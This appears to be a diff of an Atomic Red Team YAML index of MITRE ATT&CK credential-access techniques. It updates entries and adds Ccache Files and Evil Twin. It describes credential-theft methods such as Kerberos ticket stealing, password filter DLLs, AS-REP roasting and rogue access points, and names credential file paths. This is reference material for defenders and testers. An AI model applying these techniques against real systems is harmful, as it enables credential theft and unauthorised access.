       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests:
     - name: Packet Capture macOS using tcpdump or tshark
@@ -49659,7 +50304,7 @@ credential-access:
         elevation_required: true
   T1552.002:
     technique:
-      modified: '2023-07-28T18:29:56.525Z'
+      modified: '2024-10-15T16:26:46.873Z'
       name: 'Unsecured Credentials: Credentials in Registry'
       description: |-
         Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -49708,38 +50353,13 @@ credential-access:
         url: https://pentestlab.blog/2017/04/19/stored-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.002
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -49763,76 +50383,129 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
-  T1558.004:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1558.005:
+    technique:
+      modified: '2024-10-14T21:26:37.856Z'
+      name: Ccache Files
+      description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+        credential cache files (or ccache). These files are used for short term storage
+        of a user's active session credentials. The ccache file is created upon user
+        authentication and allows for access to multiple services without the user
+        having to re-enter credentials. \n\nThe <code>/etc/krb5.conf</code> configuration
+        file and the <code>KRB5CCNAME</code> environment variable are used to set
+        the storage location for ccache entries. On Linux, credentials are typically
+        stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+        On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+        naming scheme. Typically, users interact with ticket storage using <code>kinit</code>,
+        which obtains a Ticket-Granting-Ticket (TGT) for the principal; <code>klist</code>,
+        which lists obtained tickets currently held in the credentials cache; and
+        other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+        Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+        on disk and authenticate as the current user without their password to perform
+        [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+        Adversaries can also use these tickets to impersonate legitimate users with
+        elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+        Tools like Kekeo can also be used by adversaries to convert ccache files to
+        Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+        On macOS, adversaries may use open-source tools or the Kerberos framework
+        to interact with ccache files and extract TGTs or Service Tickets via lower-level
+        APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+        Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Nisani, Cymptom
-      - James Dunn, @jamdunnDFW, EY
-      - Swapnil Kumbhar
-      - Jacques Pluviose, @Jacqueswildy_IT
-      - Dan Nutting, @KerberToast
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Access'
       type: attack-pattern
-      created: '2020-08-24T13:43:00.028Z'
+      id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+      created: '2024-09-17T15:02:31.324Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1558.004
-        url: https://attack.mitre.org/techniques/T1558/004
-      - source_name: Harmj0y Roasting AS-REPs Jan 2017
-        url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
-        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
-          24, 2020.
-      - source_name: Microsoft Kerberos Preauth 2014
-        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
-        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
-          It Should Not Be Disabled. Retrieved August 25, 2020.'
-      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
-        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
-        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
-          with AS-REP Roasting. Retrieved August 24, 2020.
-      - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        source_name: SANS Attacking Kerberos Nov 2014
-        url: https://redsiege.com/kerberoast-slides
-      - url: https://adsecurity.org/?p=2293
-        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
-          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
-          Domain. Retrieved March 22, 2018.
-        source_name: AdSecurity Cracking Kerberos Dec 2015
-      - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        source_name: Microsoft Detecting Kerberoasting Feb 2018
-      - source_name: Microsoft 4768 TGT 2017
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
-        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
-          ticket (TGT) was requested. Retrieved August 24, 2020.'
-      modified: '2021-06-07T19:23:33.039Z'
+        url: https://attack.mitre.org/techniques/T1558/005
+        external_id: T1558.005
+      - source_name: Binary Defense Kerberos Linux
+        description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+          October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+          APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+        url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+      - source_name: Kerberos GNU/Linux
+        description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+          Compendium (GNU/Linux). Retrieved September 17, 2024.
+        url: https://adepts.of0x.cc/kerberos-thievery-linux/
+      - source_name: Kekeo
+        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+        url: https://github.com/gentilkiwi/kekeo
+      - source_name: SpectorOps Bifrost Kerberos macOS 2019
+        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+          Retrieved October 6, 2021.
+        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+      - source_name: Brining MimiKatz to Unix
+        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+          Mimikatz et al to UNIX. Retrieved October 13, 2021.
+        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+      - source_name: Linux Kerberos Tickets
+        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+          Teams. Retrieved October 4, 2021.
+        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1558.004:
+    technique:
+      modified: '2024-10-15T15:32:07.850Z'
       name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
       description: "Adversaries may reveal credentials of accounts that have disabled
         Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
@@ -49867,6 +50540,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Yossi Nisani, Cymptom
+      - James Dunn, @jamdunnDFW, EY
+      - Swapnil Kumbhar
+      - Jacques Pluviose, @Jacqueswildy_IT
+      - Dan Nutting, @KerberToast
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -49874,32 +50554,68 @@ credential-access:
         pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
         Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
         Microsoft 4768 TGT 2017)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Credential Request'
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Valid domain account
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      created: '2020-08-24T13:43:00.028Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1558/004
+        external_id: T1558.004
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+      - source_name: Harmj0y Roasting AS-REPs Jan 2017
+        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+          23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+          with AS-REP Roasting. Retrieved August 24, 2020.
+        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
+      - source_name: AdSecurity Cracking Kerberos Dec 2015
+        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+          Domain. Retrieved March 22, 2018.
+        url: https://adsecurity.org/?p=2293
+      - source_name: Microsoft 4768 TGT 2017
+        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+          ticket (TGT) was requested. Retrieved August 24, 2020.'
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+      - source_name: Microsoft Kerberos Preauth 2014
+        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+          It Should Not Be Disabled. Retrieved August 25, 2020.'
+        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.004
     atomic_tests: []
   T1558:
     technique:
-      modified: '2024-03-01T16:58:02.395Z'
+      modified: '2024-09-17T19:49:11.455Z'
       name: Steal or Forge Kerberos Tickets
       description: |
         Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
 
         On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
-        Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
-        Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
@@ -49935,7 +50651,7 @@ credential-access:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Logon Session: Logon Session Metadata'
@@ -49960,13 +50676,6 @@ credential-access:
         description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
           using Azure Security Center. Retrieved March 23, 2018.
         url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Kekeo
-        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
-        url: https://github.com/gentilkiwi/kekeo
-      - source_name: SpectorOps Bifrost Kerberos macOS 2019
-        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
-          Retrieved October 6, 2021.
-        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
       - source_name: Medium Detecting Attempts to Steal Passwords from Memory
         description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
           from Memory. Retrieved October 11, 2019.
@@ -49975,14 +50684,6 @@ credential-access:
         description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
           Attacks. Retrieved February 27, 2020.
         url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
-      - source_name: macOS kerberos framework MIT
-        description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
-          for Macintosh Preferences Documentation. Retrieved October 6, 2021.
-        url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
-      - source_name: MIT ccache
-        description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
-          Documentation: Credential Cache. Retrieved October 4, 2021.'
-        url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -50004,23 +50705,14 @@ credential-access:
         description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
           Secret Decoder Ring. Retrieved February 27, 2020.
         url: https://adsecurity.org/?p=227
-      - source_name: Brining MimiKatz to Unix
-        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
-          Mimikatz et al to UNIX. Retrieved October 13, 2021.
-        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
-      - source_name: Linux Kerberos Tickets
-        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
-          Teams. Retrieved October 4, 2021.
-        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555:
     technique:
-      modified: '2024-02-26T14:19:09.417Z'
+      modified: '2024-10-15T14:57:46.850Z'
       name: Credentials from Password Stores
       description: 'Adversaries may search for common password storage locations to
         obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -50071,12 +50763,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555
     atomic_tests: []
   T1552:
     technique:
-      modified: '2024-04-15T21:33:12.892Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Unsecured Credentials
       description: 'Adversaries may search compromised systems to find and obtain
         insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -50088,6 +50779,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Austin Clark, @c2defense
       x_mitre_deprecated: false
@@ -50102,18 +50794,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Application Log: Application Log Content'
@@ -50136,9 +50828,6 @@ credential-access:
         url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552
     atomic_tests:
     - name: AWS - Retrieve EC2 Password Data using stratus
@@ -50206,32 +50895,113 @@ credential-access:
           rm -rf stratus*
         name: sh
         elevation_required: false
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -50239,9 +51009,9 @@ credential-access:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -50250,21 +51020,22 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
